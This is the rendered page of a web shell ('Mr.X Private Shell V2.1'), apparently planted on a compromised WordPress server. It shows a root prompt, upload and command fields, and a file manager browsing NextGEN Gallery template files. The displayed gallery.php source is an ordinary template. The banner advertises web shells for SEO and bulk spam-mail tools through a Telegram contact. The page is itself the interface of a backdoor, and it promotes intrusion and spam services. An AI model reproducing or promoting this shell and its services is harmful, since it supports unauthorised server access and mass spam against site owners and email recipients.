__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

root@216.73.217.120: ~ $
<?php
/**
 * Template Page for the gallery overview
 *
 * Follow variables are useable :
 *
 *  $gallery     : Contain all about the gallery
 *  $images      : Contain all images, path, title
 *  $pagination  : Contain the pagination content
 *
 * You can check the content when you insert the tag <?php var_dump($variable) ?>
 * If you would like to show the timestamp of the image ,you can use <?php echo $exif['created_timestamp'] ?>
 */

?>
<?php
if ( ! defined( 'ABSPATH' ) ) {
	die( 'No direct access allowed' );}
?>
<?php if ( ! empty( $gallery ) ) : ?>

<div class="ngg-galleryoverview" id="<?php echo esc_attr( $gallery->anchor ); ?>">

		<?php if ( $gallery->show_slideshow ) { ?>
	<!-- Slideshow link -->
	<div class="slideshowlink">
		<a class="slideshowlink" href="
			<?php
		// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- \Imagely\NGG\Util\Router::esc_url() provides safe URL escaping
			echo \Imagely\NGG\Util\Router::esc_url( $gallery->slideshow_link );
			?>
		">
			<?php echo esc_html( $gallery->slideshow_link_text ); ?>
		</a>
	</div>
<?php } ?>

	<!-- Thumbnails -->
		<?php $i = 0; ?>
		<?php foreach ( $images as $image ) : ?>

	<div id="ngg-image-<?php echo esc_attr( $image->pid ); ?>" class="ngg-gallery-thumbnail-box"
									<?php
	// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- $image->style contains safe CSS style attributes
									echo $image->style;
									?>
	>
		<div class="ngg-gallery-thumbnail" >
			<a href="
			<?php
			// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- \Imagely\NGG\Util\Router::esc_url() provides safe URL escaping
			echo \Imagely\NGG\Util\Router::esc_url( $image->imageURL );
			?>
			"
				title="<?php echo esc_attr( $image->description ); ?>"
				<?php
				// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- $image->thumbcode contains safe HTML attributes for thumbnail
				echo $image->thumbcode;
				?>
				>
				<?php if ( ! $image->hidden ) { ?>
				<img title="<?php echo esc_attr( \Imagely\NGG\Display\I18N::ngg_plain_text_alt_title_attributes( $image->alttext ) ); ?>" alt="<?php echo esc_attr( \Imagely\NGG\Display\I18N::ngg_plain_text_alt_title_attributes( $image->alttext ) ); ?>" src="
										<?php
				// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- \Imagely\NGG\Util\Router::esc_url() provides safe URL escaping
										echo \Imagely\NGG\Util\Router::esc_url( $image->thumbnailURL );
										?>
				"
					<?php
				// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- $image->size contains safe HTML size attributes
					echo $image->size;
					?>
				/>
				<?php } ?>
			</a>
		</div>
	</div>

			<?php
			if ( $image->hidden ) {
				continue;}
			?>
			<?php if ( $gallery->columns > 0 ) : ?>
				<?php if ( ( ( $i + 1 ) % $gallery->columns ) == 0 ) : ?>
			<br style="clear: both" />
		<?php endif; ?>
	<?php endif; ?>
			<?php ++$i; ?>

	<?php endforeach; ?>

	<!-- Pagination -->
		<?php
		// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- $pagination contains safe HTML for pagination display
		echo $pagination;
		?>

</div>

	<?php endif; ?>

Filemanager

Name Type Size Permission Actions
album-compact.php File 3.95 KB 0644
album-extend.php File 2.32 KB 0644
gallery-caption.php File 3.35 KB 0644
gallery-carousel.php File 3.23 KB 0644
gallery.php File 3.1 KB 0644
imagebrowser-caption.php File 2.66 KB 0644
imagebrowser-exif.php File 3.9 KB 0644
imagebrowser.php File 2.66 KB 0644
singlepic.php File 1.61 KB 0644
Filemanager